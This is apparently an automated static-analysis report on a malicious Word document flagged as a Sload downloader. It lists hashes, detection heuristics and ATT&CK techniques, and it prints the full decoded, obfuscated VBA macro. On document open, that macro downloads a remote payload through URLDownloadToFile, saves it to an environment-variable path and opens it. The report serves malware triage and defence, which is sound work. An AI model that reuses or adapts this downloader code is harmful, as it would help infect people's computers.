Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6801adc1fc50dbcf…

MALICIOUS

Office (OLE)

117.5 KB Created: 2019-05-01 23:21:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 7d8a7714334c0f49de189bc1aaa9dc98 SHA-1: 229694f170a9d7c2348cb03d347b4a97863d2110 SHA-256: 6801adc1fc50dbcf73fa8c657e4aa92958c8b8a1d92e0410561d21458edd5fe9
300 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a Microsoft Office document containing VBA macros. The Document_Open macro is configured to execute automatically and uses the URLDownloadToFile API to download a payload from a remote source. This indicates a downloader functionality, typical of many malware families.

Heuristics 10

  • ClamAV: Doc.Downloader.Sload-6961205-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6961205-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private LFV2KDB As Integer
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sTHTJKxxK As Long, _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Function YaNdjoVzN3ap(f7wxbf0A) As Object
Set YaNdjoVzN3ap = CreateObject(f7wxbf0A)
End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public apMCG7qCfEkS09
Sub Document_Open()
apMCG7qCfEkS09 = Array(UdSk9gRq("T", "u"), BZCHDKP7vG("I", ":"), TPxUhQKxfR("E", "B"), OwtR0c("w", "z"), KpQtwv("M", "."), ONbBnc82h("Y", "-"), Q2Ik84jGxG7pB("P", "h"), wzi6wxCG("G", "V"), uvCsd3maa("S46QhkhX", "e8M>l2=?l"), zZUGmE0J5("/`X.QRFA", "y_IpKvPpA"), yEkGXN90q(")0ltq>i-", "c~cOK9ae|"), Qj4LrHW12xSvw(">tz{Hi7k", "3oy:>nI\."), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"))
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Function KRjbeyxU5(psRe0ioiT8k) As String
KRjbeyxU5 = Environ(psRe0ioiT8k)
End Function
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8144 bytes
SHA-256: c51f27b6fd7b7e833a1d4eafa17f88152c6d963fd563ceaf429ee055c7c48b36
Detection
ClamAV: No threats found
Obfuscation or payload: likely
83 of 157 identifiers look randomly generated (e.g. 'kV5Bo5GtMNBihnIlI11') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If 1 And VBA7 And Win64 And 1 And 1 And 1 Then
Private j0Gjo As Integer
Private LFV2KDB As Integer
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sTHTJKxxK As Long, _
ByVal Ossoj As String, _
ByVal XD9c87O0F As String, _
ByVal Z7V7Pgy51I As Long, _
ByVal AUO4Fa0MOL7N As Long) As LongPtr
Private u4o1LPC6n As Integer
Private rDiMoDYHMJraij2p5N As Integer
#Else
Private j0Gjo As Integer
Private CI8GfiRNS512G As Integer
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sTHTJKxxK As Long, _
ByVal Ossoj As String, _
ByVal XD9c87O0F As String, _
ByVal Z7V7Pgy51I As Long, _
ByVal AUO4Fa0MOL7N As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal eS5eq As String, ByVal U59M0 As Long, ByVal rBrgpmGi As String, ByVal w8TISx As String, ByVal ZavrRTW As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal esiFTISNiQI As Long) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal vOMCv49 As Long, ByVal FcOZBLLz75GYEitUD As String, ByVal J9QLToKE As Long, iBM4bMeriBr75gNt As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal UBM79C As Long, ByVal Z2u8tldnln3KT9zuWjb As String, ByVal hWW1M8c As String, ByVal mWrISD As Long, ByVal nbJATStDuQ4 As Long, ByVal TDDuZedW As Long) As Long
Private Rg31XzHy6wT As Integer

#End If
Public apMCG7qCfEkS09
Sub Document_Open()
apMCG7qCfEkS09 = Array(UdSk9gRq("T", "u"), BZCHDKP7vG("I", ":"), TPxUhQKxfR("E", "B"), OwtR0c("w", "z"), KpQtwv("M", "."), ONbBnc82h("Y", "-"), Q2Ik84jGxG7pB("P", "h"), wzi6wxCG("G", "V"), uvCsd3maa("S46QhkhX", "e8M>l2=?l"), zZUGmE0J5("/`X.QRFA", "y_IpKvPpA"), yEkGXN90q(")0ltq>i-", "c~cOK9ae|"), Qj4LrHW12xSvw(">tz{Hi7k", "3oy:>nI\."), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"), OCvZI4("0", "f"), XWRCxiqtMb("n", "g"))
CvfELQmBq
End Sub
Sub CvfELQmBq()
Dim mylr1uNRhO17E9t
Dim CrPI5
Dim MphJk1 As String
CrPI5 = Array(nqVK0pvp(lW5zf0E8KMn()), nqVK0pvp("\,e)wOiVwdCOzDeno-FTo{rn./>MeWB[xbXBe2UO"), nqVK0pvp("hJFvt}++tsR+pP3g:GdS/B_2/h1fgc-ke@<WtqXYt32DhI?CemAvceWPhY|Uo.>okls\ek,?.Ye@c2enoS*xmPD)/K}M.8TEt;+Ye=20m>9}pf,d/|G.i,oXn+b[d/:UeW0_xSa@/J\Gj>W(oeC[j7sSopk|.<S{ezG5xs5pei4p"), nqVK0pvp(EQbmW5J1vSiv()))
Dim FFl421uq2jiHj7
Set FFl421uq2jiHj7 = YaNdjoVzN3ap(CrPI5(599 - (2688) + (2092)))

MphJk1 = KRjbeyxU5(CrPI5(-7476 - (2449) + (9925))) + CrPI5(-6348 - (2894) + (9243))

Call URLDownloadToFile(nqVK0pvp(Yx3UU8zD()), CrPI5(-2192 - (-4002) + (-1808)), MphJk1, nqVK0pvp(Yx3UU8zD()), nqVK0pvp(Yx3UU8zD()))
FFl421uq2jiHj7.Open (MphJk1)
End Sub

Function nqVK0pvp(kMzYMBkzV9nR) As String
    Dim zv3Yd5DgrewzK1(-3068 - (5538) + (9661)) As Byte
    Dim UwHS6() As Byte
    Dim zf7fdL0CN6AUZfB5
    Dim Rl9ffoYN7
    UwHS6 = StrConv(kMzYMBkzV9nR, (-8833 - (-3983) + (4978)))
    For Rl9ffoYN7 = 0 To UBound(UwHS6) - 1
        If (Rl9ffoYN7 Mod 4 = (-6203 - (-8485) + (-2282))) Then
            zv3Yd5DgrewzK1(zf7fdL0CN6AUZfB5) = UwHS6(Rl9ffoYN7)
            zf7fdL0CN6AUZfB5 = zf7fdL0CN6AUZfB5 + 1
        End If
    Next Rl9ffoYN7
    nqVK0pvp = Left(StrConv(zv3Yd5DgrewzK1, (2312 - (7435) + (5187))), zf7fdL0CN6AUZfB5)
End Function

Function lW5zf0E8KMn() As String
Dim BgsL5RFBkRsFQCd
Dim spahANJ8v3A7mQB6jY
Dim WHJK20iENvjDBLw2nyy
Dim fwkjYxHvKTlYL
Dim ruvJYnZzvzOOi
Dim soBjcD83blYlMk5
Dim OkcMO4VR1jFAO
Dim g1lK9FP68j
BgsL5RFBkRsFQCd = apMCG7qCfEkS09(-7476 - (2449) + (9925))
spahANJ8v3A7mQB6jY = BgsL5RFBkRsFQCd & apMCG7qCfEkS09(-6348 - (2894) + (9243))
WHJK20iENvjDBLw2nyy = spahANJ8v3A7mQB6jY & apMCG7qCfEkS09(-2192 - (-4002) + (-1808))
fwkjYxHvKTlYL = WHJK20iENvjDBLw2nyy & apMCG7qCfEkS09(599 - (2688) + (2092))
ruvJYnZzvzOOi = fwkjYxHvKTlYL & apMCG7qCfEkS09(-1407 - (7793) + (9204))
soBjcD83blYlMk5 = ruvJYnZzvzOOi & apMCG7qCfEkS09(1754 - (-1486) + (-3235))
OkcMO4VR1jFAO = soBjcD83blYlMk5 & apMCG7qCfEkS09(1067 - (-6052) + (-7113))
g1lK9FP68j = OkcMO4VR1jFAO & apMCG7qCfEkS09(10776 - (9255) + (-1514))
lW5zf0E8KMn = g1lK9FP68j
End Function

Function EQbmW5J1vSiv() As String
Dim JC548
Dim NYB2UbAM2zdMNA0M2
Dim kNa0Db7KyF0T0CyQJdB
Dim Du4qOI9b2
JC548 = apMCG7qCfEkS09(724 - (-3930) + (-4646))
NYB2UbAM2zdMNA0M2 = JC548 & apMCG7qCfEkS09(-20 - (7620) + (7649))
kNa0Db7KyF0T0CyQJdB = NYB2UbAM2zdMNA0M2 & apMCG7qCfEkS09(4899 - (-2530) + (-7419))
Du4qOI9b2 = kNa0Db7KyF0T0CyQJdB & apMCG7qCfEkS09(-6080 - (3869) + (9960))
EQbmW5J1vSiv = Du4qOI9b2
End Function

Function Yx3UU8zD() As String
Dim jyjmJSiU7Aw3hVMAt
Dim ufw4WpIupIkcuSVI
jyjmJSiU7Aw3hVMAt = apMCG7qCfEkS09(1124 - (2301) + (1189))
ufw4WpIupIkcuSVI = jyjmJSiU7Aw3hVMAt & apMCG7qCfEkS09(2127 - (-3891) + (-6005))
Yx3UU8zD = ufw4WpIupIkcuSVI
End Function

Function gPTK7NuexkWx() As String
Dim FHHggjGwBTE
Dim lPigUFMw6fRu
FHHggjGwBTE = apMCG7qCfEkS09(1124 - (2301) + (1189))
lPigUFMw6fRu = FHHggjGwBTE & apMCG7qCfEkS09(2127 - (-3891) + (-6005))
gPTK7NuexkWx = lPigUFMw6fRu
End Function

Function vo4bGe1A() As String
Dim UPcPjVFUXPF4sCL3O0
Dim s2aHTQa47e5ZB
UPcPjVFUXPF4sCL3O0 = apMCG7qCfEkS09(1124 - (2301) + (1189))
s2aHTQa47e5ZB = UPcPjVFUXPF4sCL3O0 & apMCG7qCfEkS09(2127 - (-3891) + (-6005))
vo4bGe1A = s2aHTQa47e5ZB
End Function

Function UdSk9gRq(OOZcHdohepYHd As String, TBu6yxjDVGfDpcMow4w As String)
UdSk9gRq = OOZcHdohepYHd + TBu6yxjDVGfDpcMow4w
End Function
Function BZCHDKP7vG(GbsPUepW9b7zO7Z5nNc As String, F5s8uOS1RshkbDO As String)
BZCHDKP7vG = GbsPUepW9b7zO7Z5nNc + F5s8uOS1RshkbDO
End Function
Function TPxUhQKxfR(rIVcK7C4u8fp As String, i2H0ZSnq8i As String)
TPxUhQKxfR = rIVcK7C4u8fp + i2H0ZSnq8i
End Function
Function OwtR0c(kV5Bo5GtMNBihnIlI11 As String, zzEZky As String)
OwtR0c = kV5Bo5GtMNBihnIlI11 + zzEZky
End Function
Function KpQtwv(As8IoMG8Yz As String, W8J7n0mIezKUin9l As String)
KpQtwv = As8IoMG8Yz + W8J7n0mIezKUin9l
End Function
Function ONbBnc82h(p7kkHWRpvNl3YoSZEIE As String, StDyD As String)
ONbBnc82h = p7kkHWRpvNl3YoSZEIE + StDyD
End Function
Function Q2Ik84jGxG7pB(vvkef9K93X8Oni0hUC As String, PEijpXlFQYz As String)
Q2Ik84jGxG7pB = vvkef9K93X8Oni0hUC + PEijpXlFQYz
End Function
Function wzi6wxCG(YtmXLagBFEQuVHJ As String, BRZESEhnjVC5DsQ As String)
wzi6wxCG = YtmXLagBFEQuVHJ + BRZESEhnjVC5DsQ
End Function
Function uvCsd3maa(jm90bFbGNQ0JxBo As String, nDYEZoqKWoE5329UTIo As String)
uvCsd3maa = jm90bFbGNQ0JxBo + nDYEZoqKWoE5329UTIo
End Function
Function zZUGmE0J5(UelVf As String, OACoSvkcuh As String)
zZUGmE0J5 = UelVf + OACoSvkcuh
End Function
Function yEkGXN90q(yXzJctRcBN9YEDv As String, X08h92is90deW4 As String)
yEkGXN90q = yXzJctRcBN9YEDv + X08h92is90deW4
End Function
Function Qj4LrHW12xSvw(sTT8KBwUzCbC8JIu0wy As String, suuculfFfpIz As String)
Qj4LrHW12xSvw = sTT8KBwUzCbC8JIu0wy + suuculfFfpIz
End Function
Function OCvZI4(EvXJtfQt2y31w5xt As String, OaF0gfd9yrYM As String)
OCvZI4 = EvXJtfQt2y31w5xt + OaF0gfd9yrYM
End Function
Function XWRCxiqtMb(evHegCMHb As String, kFZ2wtrsfpnm As String)
XWRCxiqtMb = evHegCMHb + kFZ2wtrsfpnm
End Function
Function qcpJJZeKALh(r5aIIZH As String, NK263E7gOLjjgHOB0 As String)
qcpJJZeKALh = r5aIIZH + NK263E7gOLjjgHOB0
End Function
Function TjkrSv7gL6(QdjkI5B As String, jZs4C4Ounz As String)
TjkrSv7gL6 = QdjkI5B + jZs4C4Ounz
End Function
Function oe2yRkFSV(DfM8VnoDT As String, Xw67UStZrf As String)
oe2yRkFSV = DfM8VnoDT + Xw67UStZrf
End Function
Function wfdYl3WS(pX5EqNUM3UJxpvg4ip As String, rupuXoYFdRNbJUW As String)
wfdYl3WS = pX5EqNUM3UJxpvg4ip + rupuXoYFdRNbJUW
End Function
Function YaNdjoVzN3ap(f7wxbf0A) As Object
Set YaNdjoVzN3ap = CreateObject(f7wxbf0A)
End Function

Function KRjbeyxU5(psRe0ioiT8k) As String
KRjbeyxU5 = Environ(psRe0ioiT8k)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.